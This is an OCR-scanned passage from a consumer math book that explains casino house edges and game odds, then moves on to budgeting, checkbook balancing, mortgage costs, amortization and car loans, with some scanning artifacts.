bet or sucker bet, because the odds are 47:4 against). If you want 
to be an informed gambler, know the odds associated with the 
game you're playing. Use the Internet and books to learn particulars 
of your favorite games. 
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Understanding types of bets 


There are many classes of bets. Concern yourself with the two 
major ones: 


Fair odds bet: A fair odds bet pays off in exact proportion 
to the odds. If two people make a bet with each other, with- 
out the services of a bookmaker or casino, the return is equal 
to the risk. For example, if two people bet $1.00 that some- 
thing will happen, the winner gets his or her $1.00 dollar back 
plus the other person’s $1.00. The loser loses $1.00. An office 
sports pool usually works this way. 


 Viggorish bet: A bet that includes an allowance for the person 
or business conducting a game (a bookmaker or a casino) 
isn’t a fair odds bet. If it were, the “house” would go out of 
business. I explain how a viggorish bet works in the next section. 


Knowing payouts and house edge 


Gambling facilities aren’t charities; they need to make money. 
Almost all bets include a fee of some sort. 


The viggorish (also known as the vig, the juice, the cut, the rake, or 
the take) is the amount charged by a bookie or casino for giving 
you the privilege of gambling. The word comes from the Yiddish, 
probably from Russian, and means “winnings” (but not for you). 


A common term is house edge (also known as house advantage). 
It’s the percentage the house takes in on various bets. This term 
comes up again and again in assessing the best and worst bets. 
In some cases, the house edge is easy to calculate, but many bets 
require the work of a mathematician. (But don’t worry; there are 
many sources that tell you the precise house edge.) 


The closer to 0 percent a house edge is for a bet, the better the bet 
is for you. In general, any bet with a house edge of 2 percent or less 
(as in some craps bets, for example) is a good one. 


Playing the most popular games 


Should you visit casinos, you'll find (and maybe play) the most 
popular casino games. The only rules you need to follow are to 
pick your favorite games, know how to play them, and use math to 
help you improve your odds of winning. 
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The house edge and roulette 


Some formulas for calculating the house edge are pretty simple. Take roulette. 
The roulette wheel has numbers from 1 to 36, plus 0 and 00, giving 38 possible 
places where the ball may fall. The payout is 35 times the bet (35:1). The difference 
between 38 (true odds) and 35 (payout) is important. In roulette, if you bet on a 
single number, you have a probability of 1/38 of winning and a probability of 37/38 
of losing. 


A common bet is one on “red or black.” The payout is 1:1, so if you win, you get your 
bet back plus and equal amount in winnings. The table has 18 black numbers and 18 
red numbers. The wheel has 18 black and 20 non-black numbers (which also means 
that it has 18 red and 20 non-red numbers). 


To find the house edge, subtract the probability of an unfavorable outcome (20/38 
in this case) from the probability of a favorable outcome (18/38 in this case), and 
multiply the result by 100. To make a long story short, the house edge for roulette 
is 5.26 percent, making a roulette bet a fairly bad bet. The number 5.26 applies to 
every possible bet on the table. Can a casino make money on the house edge of 
“just” 5.26 percent? You'd better believe it! 


Here's a tip: If you're dying to play roulette, go to Europe. European roulette wheels 
have only a 0; there’s no 00. As a result, the house edge drops to 2.70 percent. 


Slots 


The slot machine (also known as the one-armed bandit) is 
enormously popular — the most popular casino game of all. 
Casinos are filled with hundreds or thousands of slot machines. 


Slot machines are a poor form of gambling, because people lose a 
good deal more than they win. Slot machines are typically 
programmed to pay out 82-98 percent of the money put in. 


On the road to Reno (I live nearby), billboards advertise “loose” 
slots, which means the casino is promising bigger payouts. Local 
casinos put the increasing payout amount of progressive slots on 
electronic signs on freeway billboards! (A progressive jackpot is a 
huge amount — $250,000, for example — that increases with 
every play of a bunch of “linked” machines.) In 2006, a man won 
$21 million in a Nevada Megabucks jackpot. (You can watch the 
current Megabucks in Nevada payout amount climb at http: // 
www.megajackpots.com/games/megabucks-in-nevada. 
aspx.) 
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Mother knows best 


For reasons | cannot explain, my mother never passed by a slot machine that didn’t 
like her. She once showed me the results of a little trip to Las Vegas — eighteen 
$100 bills, all won playing quarter slots. She wentto Vegas so often that the casinos 
thought she was a high roller and sent her coupons for free rooms, free meals, and 
free satin jackets. 


Once, while my father was just checking in to the hotel, she put three quarters in 
a machine and immediately hit a $250.00 jackpot — before the ink was dry on the 
registration form. Her advice: Always play three coins, not two or one. 
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You hear a lot of lore about slots. One story is that casinos make 
them looser early in the week to attract more customers on off-days. 
Another story is that the loose machines are located near the main 
entrance, so the noise from jackpots attracts customers from the 
street. In the past, the casino made a slot looser by changing the 
colorful belts on the reels; today, the casino just reprograms the 
machine. 


Blackjack 


Customers like blackjack (sometimes called “21”) because it’s easy 
to play. Casinos like blackjack because customers lose so much. 


With blackjack, you see the two cards you were dealt. You see one 
of the two cards the dealer dealt himself or herself. The object is 
to take more cards, as needed, to bring your hand up to 21 points 
without going over 21 points (busting). 


To judge how close you are to 21, you add up the values of the 
cards. Each card is worth the number you see on it (its pip value). 
Jacks, queens, and kings have a value of 10. You can treat an ace as 
either 1 point or 11 points. 


Based on your cards, the dealer’s card, and some underlying 
probabilities, you decide whether to hit (take more cards), stand 
pat (take no more cards), double down (increase your bet and take 
only one more card), or split (divide a pair into two hands and 
make an additional bet). 
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1#” When to stand: Stand when you’re holding 17-20 points, no 
matter what card the dealer is showing (the upcard). 


1#” When to hit: Hit when your cards total 5-8 points, no matter 
what upcard the dealer is showing. 


When to split: Split a pair of aces or 8s, no matter what 
upcard the dealer is showing. 


1” When to double down: Double down when you’re holding 
10 or 11 points, except when the dealer’s upcard is a 10 or an 
ace. 


Broad strategies for winning at blackjack exist, too. Here’s a list of 
strategies you can use to improve your odds and avoid bad bets: 


Following the basic strategy: The most important technique 
for winning at blackjack is to follow what’s known as basic 
strategy, which says that, in playing any hand, you make the 
best decision possible (based on the work of professional 
mathematicians). Doing so can lower the house edge to less 
than 1 percent. You can visit http: //en.wikipedia.org/ 
wiki/Blackjack#Blackjack_strategy to see 230 distinct 
scenarios for decisions. 


Counting cards: With card counting, you track the relationship 
between high-value cards (good for the player) and low-value 
cards (good for the dealer). If you learn how to count cards, 
you could get a 1-2 percent edge over the casino. To become 
a “counter,” prepare to spend maybe 150 hours practicing the 
technique, plus time learning how not to be spotted. 


Very broadly, your betting strategy is to increase your bets 
when the deck is “running in your favor.” Decrease your bets 
when the deck is “running against you.” Don’t be obvious, 
such as switching from a $5.00 bet to a $100.00 bet, because it 
draws the pit boss’s attention. 


Counting isn’t illegal, not by any means. But casinos don’t like 
it, and if you’re spotted, they may permanently bar you, and 
they may alert other casinos. For the movie version of card 
counting, rent the film Rain Man, starring Dustin Hoffman and 
Tom Cruise. 


Avoiding the hunch play: In the hunch play, you deviate from 
basic strategy. Guessing at the outcome (and being ignorant 
of how to play the game) costs most people a lot of money. 


Avoiding the insurance bet: An “insurance” bet is a side bet 
you make when the dealer’s showing an ace. It’s a bad idea. 
The house edge is about 8 percent, so forget about it. 
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Craps 

Craps is a dice game, prominent in the movies and Broadway 
musicals. It’s based on the outcome of one or more rolls of a pair 
of dice. The one person throwing the dice (the shooter) bets on the 
outcome, but so does everyone else around the craps table. 


Very briefly, here are the rules for craps: The shooter’s first roll is 
the comeout roll. If the comeout roll is a 2 (snake eyes), a 3 (craps), 
or a 12 (boxcars), the shooter loses. If the comeout roll is a 7 or 

11 (anatural), the shooter wins. Any other roll (4, 5, 6, 8, 9, or 10) 
establishes the shooter’s “point.” The shooter has to roll dice — 
again and again, if necessary — to either make the point or lose. 
The shooter makes the point in order to win, but if he or she rolls a 
7 before making the point, he or she loses. 


The shooter and everyone at the table place bets before the 
shooter rolls. When the shooter wins, everyone betting with 

him or her (a passline bet) wins. If the shooter loses, everyone 
betting against him or her (a don’t pass bet) wins. There are other 
miscellaneous bets, most of them poor choices. 


These bets are the best ones in craps: 


1# The passline bet: This is a bet that the shooter will make his 
or her point. The bet has a low house edge of 1.41 percent. 
Most players make this bet. 


The don’t pass bet: This is a bet that the shooter won’t make 
his or her point. The house edge is 1.14 percent. 


1” The odds bet: This is the only bet in the casino that doesn’t 
have a house edge, meaning it’s paid off at true odds. First, you 
place a bet on the pass line. If the shooter establishes a point 
of 4, 5, 6, 8, 9, or 10 on the comeout roll, you put an additional 
bet behind your first bet and ask for “odds.” If the point is 4 
or 10, the bet pays 2 to 1; if the point is 5 or 9, it pays 3 to 2; if 
the point is 6 or 8, it pays 6 to 5. Of course, the bet pays only 
if the shooter makes the point. 


All the other bets in craps are bad bets. For example, proposition 
bets are bets on the “hard way” (4, 6, 8, or 10, with both dice 
having the same value). So are one-roll bets, including 2 (snake 
eyes), 3 (ace-deuce, or craps), 11 (yo-leven), and 12 (boxcars). The 
house edge can be as high as 16.7 percent, depending on the bet. 
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Poker 


Poker is a card game where player skill is the biggest factor in 
determining the winner. Among other things (such as how to 

bet and how to bluff), the best players know their odds cold. For 
example, they know that in a game of five-card draw, the deck has 
1,098,240 pairs (42.3 percent probability of getting one) and only 
36 straight flushes (0.00139 percent probability of getting one). 


In poker, players compete against each other and not against the 
house. So there’s no house edge, except for a small amount the 
casino takes out of each pot. 


Video poker is also a game of skill. The house edge is small: 0.1 to 
1.4 percent. The payoff schedule may actually pay back more than 
100 percent if you play perfectly. 


The worst casino bets 


The worst casino bets to make are those where the house edge is 
high. Here are three outrageously bad ones: 


Roulette: Bets on the American roulette wheel (with both a 
0 and a 00) have a house edge of 5.26 percent. (For more on 
roulette, go to the sidebar “The house edge and roulette.”) 


Keno: Keno is a game similar to the lottery, except that draws 
are held every few minutes. Bored diners in the casino coffee 
shop fill out forms with possible winning numbers and give 
them to a “runner” while they’re waiting for food. Payoffs are 
low, and the house edge can be 25 percent or higher. 


Big Six: The Big Six wheel (Wheel of Fortune) is a large vertical 
wheel. The dealer gives it a spin, and it turns until a rubber 
pointer stops it at the winning number. The house edge is 
11-14 percent, depending on the bet. 
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The 5th Wave By Rich Tennant 


In this part... 


PP: finance may not be the easiest task in your 
life, but it’s definitely one of the most important. The 
chapters in this part make investment, insurance, and 
business easier. Here you can find information on how 


to apply real-life math in the areas of banking, credit, 
investments, and insurance. Because these fields have a 
language all their own, I explain what the specialized 
terms and concepts mean. 


As a bonus, | include a chapter on taxes because you can’t 
manage your personal finances without knowing a bit 
about what goes to the IRS and your state treasurer. 


Chapter 10 


Budgets, Bank Accounts, 
Credit Cards, and More 


In This Chapter 
Getting your budget and checkbook in order 


Understanding how interest and amortization affect your mortgage and 
other loans 


Avoiding credit card trouble 
Sifting through savings and other accounts 


D: you ever worry about money? If so, you’re a member of 

a very large club. Whereas the term finance used to mainly 
mean high finance — the province of giant banks, large corporations, 
and the government — now finance is everybody’s concern. The 
reason is simple: Income used to be more reliable, expenses were 
lower, and ways to borrow were simpler. The world of personal 
finance has grown a lot more complex. Fortunately, your real-life 
math skills can help you get through the mire. 


The great thing is that you don’t need to be a genius to do personal 
finance. In this chapter, I cover budgets, loans, bank accounts, and 
credit — all of which are part of modern life. The math related to 
these topics centers around principal and interest, and it’s is very 
much the same whether you're dealing with loans or savings. The 
rest of the math is simple addition and subtraction. 


Beginning with a Budget 


Broadly, a budget is a summary of income and expenses that you 
can use to manage money. A budget serves two purposes. First, 
knowing where your money comes from and goes to gives you 
increased control over it right now. Second, you can use a budget 
to plan for the future. 
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Identifying what's in a budget 


A budget shows income and expenses from all sources. For most 
people, income refers to the salary they receive from their 
employers, but it may also include alimony (spousal support), 
interest, or Social Security benefits. 


Expenses are everything you spend money on. A few big items 
(such as house payment, car payment, insurance, and groceries) 
account for most people’s monthly spending, but the little things 
can add up, too. Figure 10-1 shows a very simple budget. 


Category Monthly Amount 
Income 

Salary $2,600.00 | $2,600.00 
Expenses 

Rent $900.00 

Car payment $360.00 

Auto insurance $100.00 

Food $320.00 | $1,680.00 
Net $920.00 
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Figure 10-1: A simple budget showing basic income and expenses. 


The budget in the figure is a good start, but it’s pretty incomplete. 
It shows income from one source, salary. The only expenses listed 
are rent, car payment, auto insurance, and groceries. It’s a rosy 
picture — but it can be a bit misleading because it’s not complete. 
Most budgets are more complex. 


Using your math skills 
to make a budget 


When you create a budget, you use addition, subtraction, 
multiplication, and division. (Head to Chapter 1 for a review of 
these basic operations.) 


Although you can do a budget using paper and pencil, “automated” 
tools can make the process easier. They include online budget 
tools, smartphone apps, and money management software. I think 
the best tool for budgeting is the spreadsheet. You can easily 
update it, and it practically does the math for you. 
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If you don’t want to pay for spreadsheet software, get 
OpenOfficeCalc, part of the Apache OpenOffice suite. It’s owned 
by the Apache Software Foundation, a United States non-profit 
corporation. Go to http: //www.openoffice.org/ for more 
information. 


av 


To make a complete budget, follow these steps: 


1. List your income and expense items in categories. 


List every income and expense item you can think of. 
Housing, car, insurance, and food are easy to remember, 
because they’re usually the biggest expenses. But don’t 
forget credit card payments, childcare, clothing, savings, 
medical expenses, and recreation. 


Even though certain expenses, such as doctor’s visits come 
up infrequently, putting them in a monthly budget starts 
you thinking about saving to meet them. 


MBER 
ww 
¥ 


2. Record the dollar amount associated with each item. 


You can note the cost of each weekly, monthly, or annual 
item, as Figure 10-2 shows. At this point, it doesn’t matter 
whether an expense is annual (for example, a doctor’s visit 
or vehicle registration) or weekly (for example, a music 
lesson). You’ll convert everything to a monthly amount in 
the next step. 


Category Weekly | Annual | Monthly Total 
Income 

Net Salary $480.00 $2,080.00 | $2,080.00 
Expenses 

Rent $900.00 

Car payment $360.00 

Auto insurance $100.00 

Food $320.00 

Physical exam (1 x $200) $200.00 $17.00 

Dentist (2 x $80) $160.00 $13.00 | $1,710.00 
Net $370.00 
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Figure 10-2: Note categories and dollar amounts on your budget. 
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In this example, notice that salary becomes “Net Salary.” 

A net salary is the gross salary (say $600.00 per week) with 
the payroll deductions subtracted. The result here is about 
$480.00 per week. 


3. Calculate as needed to convert weekly and annual items 
into monthly numbers. 


Both calculations are easy. To convert a weekly salary into 
a monthly number, multiply it by 52 (the number of weeks 
in a year) and then divide it by 12 (the number of months 
in a year). Here’s an example, using a weekly salary of 
$480.00: 


monthly salary = (weekly salary x 52) /12 

monthly salary = ($480.00 x 52) /12 

monthly salary = $24,960.00 /12 

monthly salary = $2,080 

To convert an annual expense into a monthly expense, just 
divide by 12. Here’s an example using an annual expense of 
$324.00: 

monthly amount = annual amount/12 months 

monthly amount = $324/12 

monthly amount = $27.00 


4. Calculate net spendable income. 


This amount is also called disposable income or discretionary 
income. To calculate it, simply subtract your total expenses 
from your total income. 


Your goal is to have a little money left over. If you don’t 
have money left over, you’re “under water” or “in the red,” 
as many people are. See the next section for some ways 
you can get back in the black. 


Applying budgeting principles 


Your budget should help you see clearly what you make and 
what you spend. With that info at hand, it’s time to take charge. 
Following are typical weak spots that a budget will show: 


No money left: If all your income is consumed by expenses, 
you're living close to the edge. One unexpected expense can 
put you under. 


No savings: A little money in savings can help you meet some 
disasters, such as a major automobile repair. No savings 
means no safety net. 


—— Chapter 10: Budgets, Bank Accounts, Credit Cards, and More ] 6 7 


No allowance for vacation: All work and no play makes Jack 
(or Jill) a dull boy (or girl). 


Each of these scenarios means that you need to make some 
changes. Fortunately, there’s hope! Change isn’t always easy, but 
here are some things you can possibly do to get your budget on 
firmer footing: 


Make more money. Increasing your income isn’t easy, but 
it’s possible. Maybe you can make more money by taking on 
a second job or selling items online. If increasing what you 
bring in is impossible, don’t despair. There are other ways to 
solve this problem. 


Reduce expenses. See where (and if) you can lower expenses. 
You're probably stuck with some payments, but maybe you 
can economize on food or entertainment. See Chapter 5 for 
information about reducing your shopping expenses. 


Live within the budget. At the very least, don’t spend more 
than you already do. Technically, this is called a budget 
constraint. 


Pay down credit cards. Credit cards suck more blood than 
Count Dracula or anyone in the cast of Twilight. When the 
cards are paid off, don’t load them up with debt again. 


1” Stop spending on things you don’t care about. Take a hard 
look at things that aren’t really important to you. Do you 
really need 250 channels on your cable or satellite TV? Do 
you really lust for fast food? If not, reduce those expenses or 
let them go altogether. 


1# Set goals. Say you want a vacation more than a double bacon 
cheeseburger. After you let go of spending on fast food, set a 
vacation goal. Any vacation saving, even as little as $10.00 per 
week (about $40.00 per month), is a good start toward meeting 
your goal. 


Balancing Vour Checkbook 


Balancing a checkbook, as you very likely know, means keeping 
the balance in your check register in agreement with your bank 
statement. 


The system isn’t perfect, because invariably you make new 
deposits and write new checks while the bank is preparing and 
mailing your monthly statement. The end result is that you have 
a few items in your check register that don’t appear on the 
statement, but you still have to account for them. 
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Because the task can get confusing if you aren’t careful, some 
people avoid checkbook balancing. Just the same, like eating 
your vegetables, balancing is good for you. You’ve got to do it, or 
you won’t know how much money you really have in your bank 
account. 


Even though balancing a checkbook requires only simple addition 

and subtraction skills, the process may seem difficult until you get 
used to it. Here’s a simple checkbook balancing method that really 
works: 


1. Find the date to reconcile to. 


On the bank statement, find the date of the last transaction, 
whether it’s a check clearing, a deposit, or a charge. This 
date is the one you reconcile to. 


2. Find the same (or closest) date in your register. 


Draw a line in your register under the date closest to the 
statement closing date. There’s no need to worry about 
deposits you’ve made or checks you’ve written after that 
date. 


3. Write both balances — the statement balance and 
register balance — on the back of your statement (see 
Figure 10-3). 


4. In your register, check off cleared items and draw a little 
circle next to uncleared items. 


Cleared items are checks, deposits, and ATM transactions 
that the bank shows it processed. 


5. Under the bank’s ending balance, write any uncleared 
items from your register; then subtract the uncleared 
checks (very likely) from the balance and add uncleared 
deposits (not so likely) to the balance. 


Statement 


10731 | Ending balance | $477.21 


Register 


10/24 ‘ $277.45 


Illustration by Wiley, Composition Services Graphics 


Figure 10-3: Write down the balances on the back of your statement. 
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6. Under your register balance, write any unrecorded items 
from the bank statement. 


Typically, this includes monthly fees and interest, if you 
have a checking account that pays interest. It might also 
include a check you wrote or a deposit you made that you 
forgot to enter in your register. 


In the example in Figure 10-4, you’ve recorded a credit card 
payment that you know about but that the bank hasn’t 
processed yet. You’ve also recorded a monthly fee that the 
bank knows about, but that you haven’t processed yet. 


You're close, but the two balances don’t agree! What’s wrong? 


7. If the balances don’t agree, check your register for math 
errors. 


In the example, you can see a difference of $0.24. So when 
you find an error (usually a math error or a check or 
deposit having been recorded incorrectly), record the 
adjusting item, as shown in Figure 10-5. 


This is great! After adjusting for the error, your register 
balance and the bank’s balance agree — to the penny! 


8. Tidy things up. 


Make sure your register has an entry for each adjusting 
item, including bank fees and/or interest and math/record- 
ing errors. It’s a must, or you’ll have problems when you 
reconcile next month. It’s also nice to mark “AGREES” at 
the reconciling line. 


Useful symbols for your register are DEP (deposit), EFT (electronic 
funds transfer), ATM (ATM or debit card transaction), CHG (for 
monthly fees), and INT (interest). 


Statement 


10/31 | Ending balamet $467.21 
#1024 | Visa payment -$200.00 
$267.21 


Register 


10/24 [Erding balance $27.45 


Charge | Monthly fu -$10.00 
$267.45 
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Figure 10-4: Noting uncleared items. 
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Statement 


10/31 | Ending balance $467.21 
#1024 (Visa payment -$200.00 
$267.21 


Register 


10/24 | Ending balance $277.45 


Charge | Monthly fu -$10.00 
Adj Math error -$0.24 
$267.21 


AGREES! 
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Figure 10-5: Adjust for an errors in your register. 


Homing in on Mortgage Math 


In its simplest terms, a mortgage (called a deed of trust in about 21 
states in the United States) is the loan you get to buy your home. If 
you make the payments, you end up owning the house. If you don’t 
make the payments, the bank forecloses. 


Your first mortgage, the first trust deed, is the most important home 
loan. There are other kinds of home loans, but they are subordinate 
to the first trust deed. 


To put it simply, you pay a down payment (typically 20 percent of 
the home’s selling price), and the bank lends you the rest of the 
price of the home. The amount loaned is the principal, and you 
pledge the house as security (a valuable asset the bank can take if 
you fail to pay off the loan).The loan accrues interest (the money 
the bank charges for the loan). You pay off the loan by paying back 
the principal and interest. After that, nothing’s simple. 


Having a PITI party 


Your loan payment is made up of four parts: principal, interest, 
taxes, and insurance — PITI. 


Principal 


The amount you borrow is called the principal. Calculate principal 
as follows: 


principal = selling price— down payment 
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Principal is also called the loan amount. Other costs are associated 
with closing the loan transaction. They are one-time-only fees; 
they’re separate from the basic loan, but they can usually be 
added to the loan amount. 


Closing costs include title search, title insurance, recording fees, 
broker/agent commissions, application fees, appraisal fees, termite 
inspection fees, and home warranties. 


Interest 


You pay interest on the mortgage loan. Charging interest is how 
banks make their money. Interest rates available for home loans 
can vary widely, and sometimes offerings seem to change daily. 


In two popular loans, the 30-year fixed interest loan and the 15-year 
fixed interest loan, the interest rate is steady over the life of the 
loan (30 years and 15 years, respectively). A fixed-rate mortgage 
(FRM) is a “plain vanilla” mortgage, which is a pretty good idea. 


An adjustable rate mortgage (ARM) — also called a variable-rate 
mortgage — is another option. This type of mortgage has an 
interest rate that can float, or change, going up when interest rates 
go up and going down when they fall. ARMs are usually tied to 
(indexed to) an index, such as the London Interbank Offered Rate 
(LIBOR) that reflects the cost of the lender’s borrowing the money 
to lend you. ARM interest rates are usually lower than fixed rate 
mortgage interest rates, which is one of the things that make them 
seem attractive, but remember, they can adjust, and what comes 
down can go up. 


Does a lower interest rate make a difference? You bet it does. The 
interest rate affects your monthly payment amount and the total 
you pay over the life of the loan. Table 10-1 compares four interest 
rates for a 30-year $180,000 loan. 


Table 10-1 Interest Rates for a $180,000 Loan 

Interest Rate Monthly Payment Total Interest Total Cost 
3.0 percent $758.89 $93,200.40 $273,200.40 
3.5 percent $808.28 $110,980.80 $290,980.80 
4.0 percent $859.35 $129,366.00 $309,366.00 


4.5 percent $912.03 $148,330.80 $328,330.80 
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Notice that each 0.5 percent increase in the interest rate sends 
your monthly payment up by about $50.00. Notice that each 0.5 
percent increase sends the total cost of the loan up by about 
$18,000.00. 


For math for real life, don’t get hung up using formulas to determine 
loan figures yourself. Instead, use an online mortgage loan calcula- 
tor, such as this one: http: //www.bankrate.com/calculators/ 
mortgages/mortgage-calculator.aspx. 


To reduce monthly payments and the total cost of the loan, either 
shop around for a good interest rate or pay points. A discount point 
is a form of pre-paid interest. Some call it a bribe for the bank. 
Others call it a gamble that the money you pay for points will save 
you interest charges in the long run. Commonly, purchasing points 
is called a buydown. 


Typically, each point you can buy reduces the interest rate by 1/8 
percent (0.125 percent), and a point typically costs 1 percent of 
the loan amount. In general, the bank may offer you a chance to 
buy two points, resulting in a 0.25 percent drop in the interest rate. 
Figure 10-6 shows a very simple buydown comparison. 


BUYDOWN COMPARISON 
Rate | Monthly Payment | Total Interest | Total Cost 
4.50% $912.03| $148,330.80 | $328,330.80 
4.25% $885.49| $138,776.40 | $318,776.40 
DIFFERENCE $26.54 $9,554.40 | $9,554.40 
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Figure 10-6: A buydown comparison. 


With a $180,000 loan, buying down from 4.50 percent to 4.25 percent 
costs you $3,600 (2 percent of $180,000). Is it worth it? Given that 
it reduces the monthly payment by $26.54 and reduces the total 
interest by $9,554.40, it seems like a pretty good deal. 


A discount point isn’t the same thing as a loan origination point. 
That’s a scheme where you pay for some of the costs of the loan 
origination process. 


Taxes 


Property taxes are part of home ownership, and lenders aren’t 
exactly filled with trust that you'll pay. To ensure you pay taxes on 
your property (which is really the bank’s property until you pay 
your mortgage off), your loan payments may include an allowance 
for taxes. 
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In California, where I live, we typically use 1.25 percent of the 
purchase price as an estimate of annual property taxes. For a 
$200,000 home, calculate taxes as follows: 


tax = purchase price x 1.25 percent 
tax = $200,000 x 0.0125 
tax = $2,500.00 


Insurance 


Private mortgage insurance (PMI) is also known as lenders’ mortgage 
insurance. PMI insures against your defaulting on the loan. The 
bank gets the benefit, and you pay the premium. 


Here’s how PMI works: If you default and the bank repossesses, 
the bank may not be able to sell the foreclosed home for a lot of 
money. PMI helps pay the bank back for its loss. 


As I mention earlier, the bank isn’t especially trusting. It’s even less 
trusting if you don’t have “skin in the game” — that is, if your down 
payment is low. A mere 10 percent down payment means the loan 
to value ratio (LTV) is 90 percent. That’s a relatively high number. 
The LTV is important because it determines whether or not PMI 

is required. If your LTV is 80 percent or less, you may be able to 
forego private mortgage insurance altogether. 


Here’s how you calculate LTV. In this example, the cost of the 
home is $200,000 and the loan amount is $180,000 (which means 
you made a $20,000 down payment): 


LTV = loan amount _ 100 
purchase price 


$180,000 
LTV = $200,000 * 10 
LTV = 0.80 x100 


LTV = 80 percent 


Beware the low down payment! If you have an LTV of 90 or 

95 percent, PMI may be as high as 1.15 percent of the loan amount 
per year. The way to get a better (read, lower) LTV is to make a 
higher down payment. 


To see how much your annual PMI premium is, use this calculation: 


annual PMI premium = loan size x 1.15 percent 
annual PMI premium = loan size x 0.0115 
annual PMI premium = $180,000.00 x 0.0115 
annual PMI premium = $2,070.00 
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In this example, the home costs $200,000, with a 10 percent down 
payment of $20,000. The resulting LTV is 90 percent. The PMI pre- 
mium for the year is $2,070, or about $172.50 per month! 


PITI: Putting it all together 


To see the approximate monthly bottom line of a mortgage payment, 
you add up the monthly principal, interest, taxes, and insurance. 


PITI = principal + interest + taxes + insurance 
PITI = $283.28 + $525.00 + $208.00 + $175.00 
PITI = $1,191.28 


This amount is an approximation, as it reflects only the first month 
in a 360-month loan. Over the course of the loan, the principle and 
interest vary slightly every month. See the next section for info 
about amortization. 


Amortization: Paying down the loan 


Amortization is the gradual paydown of a loan. The term comes 
from the Old French amortir — to reduce to the point of death. So 
you “kill off” your mortgage by paying it down. 


Each monthly payment pays a bit of principal and a bit of interest. 
As the balance of the loan goes down, you pay a little less interest 
and a little more principal each month. To see what’s happening, 
the lender gives you an amortization schedule. Figure 10-7 shows an 
amortization schedule for the last six months of a loan. 


Month/Year | Payment | Principal Paid | Interest Paid | Total Interest | Balance 
Feb 2042 $983.88 $963.23 $20.65) $154,144.88 | $4,867.56 
Mar 2042 $983.88 $966.64 $17.24| $154,162.12 | $3,900.92 
Apr 2042 $983.88 $970.06 $13.82 | $154,175.94 | $2,930.86 
May 2042 $983.88 $973.50 $10.38 | $154,186.32 | $1,957.36 
Jun 2042 $983.88 $976.95 $6.93 | $154,193.25 | $980.41 
Jul 2042 $983.88 $980.41 $3.47 | $154,196.72 $0.00 
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Figure 10-7: An amortization schedule. 


Notice that monthly payments are fixed, but the amount of 
principal paid rises a little each month and the amount of interest 
paid decreases a little each month. At the beginning of the 30-year 
period, interest was the biggest component of the monthly 
payment. 


—— Chapter 10: Budgets, Bank Accounts, Credit Cards, and More 1 15 


How do you calculate amortization? Use an online calculator. 
Although you could do it by hand with the following formula for 
the payment (p), it’s not practical: 


_ Por (l+r)" 
4 (1+r)"-1 


In this formula P, is the initial principal, r is the monthly percentage 
rate (the annual percentage rate divided by 12), and n is the 
number of payments (typically 360 payments in 30 years). Too 
much math for my taste! 


A 


1A 
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Reducing how much interest you pay 


There are a few ways you can reduce the amount of interest you pay on your 
mortgage: Shorten the term from a 30-year fixed rate mortgage to a 15-year fixed 
mortgage, make one or more lump sum payments, or pay a little extra on principal 
each month: 


Shortening the term: If you have the income (and if the bank agrees), you may 
qualify for a shorter-term mortgage, such as a 15-year fixed. If you already have 
a 30-year fixed, you may be able to refinance to a 15-year fixed. 


With a 15-year fixed, you pay more per month, but you pay off the loan in 15 
years, saving yourself a bundle of interest in the process. Look at this comparison 
between a 30-year fixed and a 15-year fixed mortgage for a $200,000 loan. As you 
can see, you pay $524.55 more each month, but you save $77,451.36 in interest over 
the life of the loan. You also own your home sooner. Your best tool for mortgage 
comparisons is an online mortgage calculator. Visithttp: //www.bankrate. 
com/calculators/mortgages/mortgage-loan.asp. 


30 VS. 15 YEAR COMPARISON 


Term Rate | Monthly Payment | Total Interest | Total Cost 
30 years 4.00% $954.83 | $143,739.01 | $343,739.01 
15 years 4.00% $1,479.38 $66,287.65 | $266,287.65 
DIFFERENCE -$524.55 $77,451.36 | $77,451.36 
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Making lump sum payments: Lump sum payments are the payment of a 
large amount of the principal at one time. Say, for example, you get a bonus 
each year and put your entire bonus toward the principal of your loan. Such 
payments typically don't shorten the term of the loan, but they do reduce the 
total interest paid. 


Paying a little extra: Pay a bit extra on principal each month. Increasing each 
monthly payment by a few hundred dollars (maybe just $100.00) helps bring the 
balance down more quickly, and that reduces the total interest paid. 


] 76 Part lil: Math to Manage Your Personal Finances 


A second mortgage or home 
equity line of credit 


A second mortgage or second deed of trust is a second loan secured 
by your home. Second mortgages are subordinate to first mortgages. 
If you default on your second mortgage, the first mortgage gets 
paid off first. 


You can also call a second mortgage a home equity loan. You would 
most likely “take out a second” to finance major expenses, such as 
college or big home improvements. Such a loan is typically a 
fixed-term loan. 


In the United States, another form of home equity loan, the home 
equity line of credit (HELOC) is common. It’s a useful, but somewhat 
risky, way to “pull money” out of your home. It’s a revolving 

line of credit, so you can think of it as a variable-term loan. That 
means “it never ends.” (I explain revolving credit in the section 
“Understanding how credit cards work.”) 


With a HELOC, you borrow only sums you need, up to a credit 
limit. The risk is that you will use the money to fund your lifestyle, 
not to meet major expenses. Should home prices go down, you 
may find that you’re “under water.” That is, what you owe on your 
house is greater than its value. 


Using Smart Math for 
Other Big Purchases 


Your home loan (or “first”) is a biggie. So is a second mortgage 

or home equity line of credit. But they aren’t the only kinds of 
useful loans. Two other common loans that typically involve large 
amounts are car loans and education loans. 


Cruising around car loan math 


An automobile loan is possibly the second biggest loan you have. 
With cars costing thousands of dollars (some as high as $32,000 to 
$60,000 or more), very few people have the ability to pay cash. 


The total cost of a car loan is easy to see: 


total cost of loan = agreed-upon price — trade-in - down 
payment + tax + interest 
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The loan will be amortized over 36 to 72 months. In the “old days,” 
36 months was standard, but as cars got more expensive, the 
terms of auto loans increased to make the cars appear more 
affordable. 


When you know the basics of the loan you want (total price, term, 
and interest rate), use an online car payment calculator to figure 
your monthly payments. For example, you could visit http: // 
www.bankrate.com/calculators/auto/auto-loan- 
calculator.aspx. 


Here are some things to keep in mind about auto loans: 


If you find a dealer who advertises “We approve everyone,” 
you will be probably be getting into a pretty bad loan. 
Dealers who lend to higher-risk purchasers are willing to 
assume the risk of likely defaults because they make up the 
cost by charging high interest rates. In other words, the cost 
of the bad loans is paid by everyone else’s loan. 


A credit union is the best place to get a car loan. 


If you can, sell your old car privately. You can get a better 
price than any dealer will give you on trade-in. Then you'll be 
able to put a larger down payment on the new car. 


If possible, buy a car directly from the owner rather than 
a dealer. Chances are, you'll be able to get a better deal 
because private sellers don’t charge commissions and don’t 
have to run a dealership at a profit. Although a private seller 
obviously wants to get a good price for the car, he or she also 
may be motivated by nonfinancial considerations, such as 
just getting rid of the vehicle to make room in the garage. In 
addition, because you have to save up the money for a private 
purchase, you may be able to avoid a loan altogether and will 
own the car the moment you buy it. 


Learn all the fees before you buy from a dealer. Expect 
